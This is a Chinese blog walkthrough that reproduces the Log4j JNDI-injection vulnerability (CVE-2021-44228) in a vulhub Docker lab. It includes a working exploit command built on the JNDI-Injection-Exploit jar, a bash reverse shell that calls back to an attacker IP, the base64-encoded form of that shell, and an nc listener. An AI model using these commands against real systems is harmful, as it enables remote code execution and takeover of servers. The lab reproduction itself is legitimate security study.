Log4j漏洞环境搭建,复现

最新推荐文章于 2024-02-20 20:15:52 发布
最新推荐文章于 2024-02-20 20:15:52 发布
阅读量166 收藏 1
点赞数
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77315080/article/details/133306181
版权

环境搭建

1.虚拟机安装docker

kali虚拟机安装docker环境和vulhub环境

安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment

克隆环境:git clone https://github.com/vulhub/vulhub.git

启动docker        

进入vulhub/log4j/CVE-2021-44228

启动环境:

docker-compose up -d

启动后查看镜像,进入网站

 漏洞复现

首先验证漏洞是否存在

DNSlog获取一个网址

利用临时获取的payload访问原来的地址,并将action的参数换成payload

回到dnslog点击Refresh Record,出现返回结果,说明存在log4j漏洞

漏洞利用
这里选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
下载JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,下载地址为https://github.com/bkfish/Apache-Log4j-Learning/tree/main
应用工具JNDI-Injection-Exploit搭建服务:格式:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “ip(攻击机)”

这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。
接下来要实现反弹shell,可以用命令

bash -i >& /dev/tcp/ip/port 0>&1

注意“命令”必须经过编码,不然将无法实现

对执行的命令进行加密bash64进行加密

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTE4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.118

 

设置监听端口

nc.exe -lvvp 6666

将DNS的payload换成刚获得的ldap的参数,然后回车访问

查看监听发现已经反弹shell

注意:下载nc后需要开启防火墙进入高级防火墙设置入站规则新建一个监听端口

并将NC允许应用通过防火墙,否则监听不到端口

不挖洞的鼹鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1306
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocus的log4j2靶场docker,使用Kali系统进行复现实验。
一、log4j环境搭建
念念不忘 必有回响
08-30 474
1、添加jar包,将log4j的jar包(如:log4j-1.2.17.jar )加入到 webContent/WEB-INF/lib 目录下 2、新建 log4j.properties 文件 置于根目录,即src目录下,如:src/log4j.properties,此时系统可以自行查找到 log4j.properties 配置文件置于其他目录,如:src/conf/log4j.prope
log4j漏洞复现
Massimo__JAVA的博客
08-03 400
Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。
漏洞环境搭建+复现】CVE-2021-44228 Apache Log4j 远程代码执行
LJW_IIE的博客
02-15 3494
CVE-2021-44228 Apache Log4j 远程代码执行漏洞环境搭建+验证1 Apache Log4j1.1 log4j的简介1.2 log4j漏洞危害1.3 影响范围2 漏洞环境搭建2.1 工具2.2 靶机搭建2.3 漏洞利用2.3.1 构建POC代码2.3.2 测试3 修复建议 1 Apache Log4j 1.1 log4j的简介 Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 1996
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
Log4j远程代码执行漏洞环境搭建复现
最新发布
m0_71263989的博客
02-20 1436
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
环境搭建+复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞+原理解析
baidu_25106003的博客
12-14 2689
复现 https://blog.csdn.net/qq_40989258/article/details/121862363 原理解析: https://www.zhihu.com/question/505025655/answer/2265606581
Log4j2 RCE漏洞及靶场搭建
weixin_51387754的博客
12-11 6185
漏洞简介 Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。 目前受影响的Apache Log4j2版本: 2.0 ≤ Apache Log4j <= 2.14.1 漏洞复现 在下载镜像复现之前确保,虚拟机非处于挂起状态! 在下载
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4290
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
java的log4j_Java log4j环境搭建
weixin_35215225的博客
02-16 387
一、Log4j是什么?Log4j是Apache的一个开源代码项目,通过使用Log4j,我们可以控制日志信息输出的目的地。最常见的就是输出到控制台或者日志文件。同时,它强大的一点是可以在C、C++等其他程序中使用,只要有相关的接口包即可。二、如何在Java环境下配置Log4j?网上的好多做法要么照本宣科,解释的太繁琐,要么太简略,让人不得要领,其实步骤非常简单。Log4j支持两种配置文件格式:XML...
虚拟机快速搭建log4j环境
hackzkaq的博客
01-25 3269
搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全——月月大魔王 log4j环境下载,请在公众号(白帽子左一)后台回复:“log4j环境”获取 之前log4j漏洞出来的时候,我问了我的同学,他们正好用过这个,我就麻烦我同学打包了一个发给我 我自己试了一下,还是可以用的,自己也尝试命令执行了,也能成功 我虚拟机用的是win7的,装的java1.8的环境 如果没装java环境,我把我用的放在压缩包里了(带java环境的压缩包,一直上传不了,我就删掉了,可以找找自己本机的安装包还在不在试一下)
log4j-slf4j-impl cannot be present with log4j-to-slf4j
Master_Shifu_的博客
07-22 4595
log4j-slf4j-impl cannot be present with log4j-to-slf4j
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4320
Log4j2 RCE漏洞原理与复现
log4j漏洞搭建及其复现
m0_65150886的博客
09-26 220
vulhub是一个开源漏洞靶场,可以在安装和docker-compose 后,使用简单的指令搭建漏洞环境。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
log4J2靶机搭建和漏洞复现
qq_34415266的博客
01-16 5038
log4J2漏洞的靶机搭建和攻击复现详细过程
log4j 2 远程代码执行漏洞原理与搭建反弹shell
flyingwind2000的博客
09-03 2214
本文讲述log4j 远程代码执行漏洞简单原理, 以及如何详细搭建一台服务器进行测试, 同时使用反弹技术控制与接管靶机. 本文假定阅读者具备一定功底, 如初入门级安全渗透人员, 熟练掌握LINUX, 具备简单java开发经验,且熟练使用工具.
Log4j2安全漏洞复现及解决
此文档似乎是在尝试复现Log4j2的一个特定版本()中的bug,这通常指的是CVE-2021-44228,也被称为“Log4Shell”漏洞。这是一个远程代码执行(RCE)漏洞,允许攻击者通过操纵日志记录输入来注入并执行恶意代码。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值